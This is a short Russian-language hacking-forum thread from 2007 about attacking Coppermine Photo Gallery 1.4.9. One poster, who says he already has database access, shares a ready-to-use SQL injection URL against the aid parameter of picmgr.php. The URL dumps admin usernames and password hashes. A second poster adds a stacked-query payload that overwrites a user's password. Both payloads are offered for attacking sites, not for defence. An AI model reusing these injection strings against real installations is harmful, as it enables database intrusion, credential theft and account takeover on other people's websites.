Coppermine Photo Gallery 1.4.9

Discussion in 'Уязвимости' started by AllaryS, 28 Jul 2007.

  1. AllaryS

    AllaryS New Member

    Joined:
    31 Jan 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Пробился к базе могу селектить, вопрос можно ли выполнить INSERT или UPDATE

    P.S. Да сам пробовал никак не получаеццо 8(
    P.P.S Пользовалсо уязвимостью скрипта picmgr.php переменной aid

    Code:
    http://host/gallery/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20--
     
    #1 AllaryS, 28 Jul 2007
  2. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    зависит от того есть ли мэджик квоутс и есть ли права у юзера для апйдета-инзерта
    а вообще вид запроса такой

    Code:
    select * from sometable 
where ='[B][COLOR=Red]x';
      UPDATE user
      SET pass = '31337'
      WHERE email = '[email protected]';[/COLOR][/B]
    то есть ./picmgr.php?aid=31337';UPDATE+user+SET+pass='31337'+WHERE+email='[email protected]';
     
    #2 darky, 28 Jul 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.